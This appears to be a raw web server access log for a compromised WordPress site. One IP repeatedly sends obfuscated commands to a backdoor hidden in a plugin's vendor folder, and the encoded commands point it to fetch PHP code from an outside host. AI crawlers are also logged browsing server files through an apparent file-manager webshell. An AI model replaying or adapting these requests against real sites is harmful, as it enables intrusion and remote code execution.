107.191.43.201 - - [13/May/2026:12:21:03 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323836332p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393236332q3465616137643533346362666165383963636562623833663236653231343331222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:26:35 -0400] "GET /p/beef%2031147826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss%2Fwp-admin.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss HTTP/1.0" 200 6764 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [13/May/2026:12:26:42 -0400] "GET /p/ball%2022319825?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fterm-description HTTP/1.0" 200 7187 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:21:23 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323838332p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393238332q3332336436623336663737333531656664613866393835343031623635643533222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [13/May/2026:12:26:53 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/class-wp-user-request.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 7252 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [13/May/2026:12:22:29 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323934392p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393334392q3837393637303231356435633434363435303164646164373161623536626138222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:27:12 -0400] "GET /p/bale%2010159824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages%2Fpost-formats-vs.png&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages HTTP/1.0" 200 6645 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [13/May/2026:12:27:36 -0400] "GET /p/ball%2022131825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Flogs%2Fproxy_access_ssl_log.statbuf&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Flogs HTTP/1.0" 200 6622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:23:32 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639333031322p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393431322q6339396133356533653962666335356131613933666230663265616430303535222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [13/May/2026:12:27:49 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/.htaccess&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 6719 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.129 - - [13/May/2026:12:28:06 -0400] "GET /p/atom%2022539817?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fcomments-pagination HTTP/1.0" 200 7328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [13/May/2026:12:28:39 -0400] "GET /p/bale%2010639824?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs HTTP/1.0" 200 10741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [13/May/2026:12:28:44 -0400] "GET /p/beef%2031147826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fmath%2Feditor.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fmath HTTP/1.0" 200 6702 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:23:52 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639333033322p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393433322q6666626639366134393036643039386264633330363037346163316264646339222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [13/May/2026:12:28:53 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/class-wp-error.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 8456 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [13/May/2026:12:24:12 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639333035322p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393435322q3330396361613332363735643565623230653436326461663439313030343539222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:29:15 -0400] "GET /p/bale%2010587824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs%2Fjquery%2Fui%2Feffect.js&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs%2Fjquery%2Fui HTTP/1.0" 200 12184 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:24:32 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639333037322p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393437322q6661366432383033633836386335343730666439346133323865663035343035222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:29:46 -0400] "GET /p/bale%2010639824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fimages%2Fwpicons.png&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fimages HTTP/1.0" 200 6640 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:24:52 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639333039322p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393439322q3938663235623365353961623236393561653833373132353832616666396164222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [13/May/2026:12:29:58 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/class-wp-fatal-error-handler.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 9351 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [13/May/2026:12:26:04 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639333136342p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393536342q3864656239633362396533393235336364356232373061366138613739366436222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:30:16 -0400] "GET /p/atom%2020343817?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fplugins%2Fenvato-elements%2Finc HTTP/1.0" 200 7185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [13/May/2026:12:30:46 -0400] "GET /p/beef%2032911826?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fplugins%2Fwpforms-lite%2Fassets HTTP/1.0" 200 7181 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [13/May/2026:12:30:54 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/class-wp-recovery-mode-email-service.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 10105 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.129 - - [13/May/2026:12:31:17 -0400] "GET /p/atom%2021559817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fcss%2Fbuttons-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fcss HTTP/1.0" 200 8964 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:26:24 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639333138342p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393538342q6664383735373965646638313665333637613630393833616338316332633934222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:31:37 -0400] "GET /p/atom%2022219817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fembed%2Ftheme.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fembed HTTP/1.0" 200 6722 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:26:44 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639333230342p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393630342q3966383630393931303432303861373038636537633230663738633762316365222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [13/May/2026:12:31:55 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/rss-functions.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 6797 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [13/May/2026:12:27:04 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639333232342p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393632342q3530313535363330633064653237653639346635393932376261366135313961222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:32:08 -0400] "GET /p/ball%2022851825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fcss%2Fwp-auth-check-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fcss HTTP/1.0" 200 7408 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:27:49 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639333236392p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393636392q6262313636396263363165353961613631636634336230303163653930373733222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:32:42 -0400] "GET /p/beef%2030199826?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fplugins%2Fseo-by-rank-math HTTP/1.0" 200 7364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [13/May/2026:12:32:49 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/class.wp-dependencies.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 6806 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.129 - - [13/May/2026:12:33:05 -0400] "GET /p/beef%2031387826?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Favatar HTTP/1.0" 200 7307 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:28:53 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639333333332p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393733332q3630633739316530386261613339326636363261303231336233336231396632222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:33:11 -0400] "GET /p/ball%2022195825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss%2Fwp-admin.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss HTTP/1.0" 200 6739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [13/May/2026:12:33:16 -0400] "GET /p/beef%2030163826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss%2Fwidgets-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss HTTP/1.0" 200 9821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [13/May/2026:12:33:40 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/https-detection.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 8554 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.129 - - [13/May/2026:12:33:41 -0400] "GET /p/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fvar%2Fwww HTTP/1.0" 200 6611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [13/May/2026:12:34:12 -0400] "GET /p/beef%2032787826?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fplugins%2Fbyrar HTTP/1.0" 200 7542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:29:13 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639333335332p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393735332q3434346233623938623031653938366233646232346261333638623534306162222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [13/May/2026:12:29:33 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639333337332p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393737332q6134346131366463383765356530313534646233366230336566333338653630222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:34:37 -0400] "GET /p/beef%2031335826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-post.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 8280 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [13/May/2026:12:34:46 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/deprecated.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 49664 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
